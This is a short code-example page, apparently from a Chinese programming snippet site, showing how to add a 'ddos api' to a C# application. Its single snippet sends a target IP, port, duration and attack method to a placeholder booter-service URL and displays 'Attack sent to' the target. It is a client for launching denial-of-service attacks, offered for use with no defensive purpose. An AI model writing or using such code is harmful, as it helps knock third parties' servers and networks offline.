📜  如何将 ddos api 添加到 ac# 控制台应用程序 - C# 代码示例

📅  最后修改于: 2022-03-11 14:48:48.959000             🧑  作者: Mango

代码示例1
add strings: IP, PORT, TIME, METHOD then input this
  
  
  var resp = wc.UploadString("https://yourapi", "POST",
                   $"{{ \"target\":\"{target}\", \"port\": {port}, \"duration\": {time}, \"method\": \"{method}\"}}");
                MessageBox.Show($"Attack sent to {target} using port {port} for {time} Second/s with {method} method.");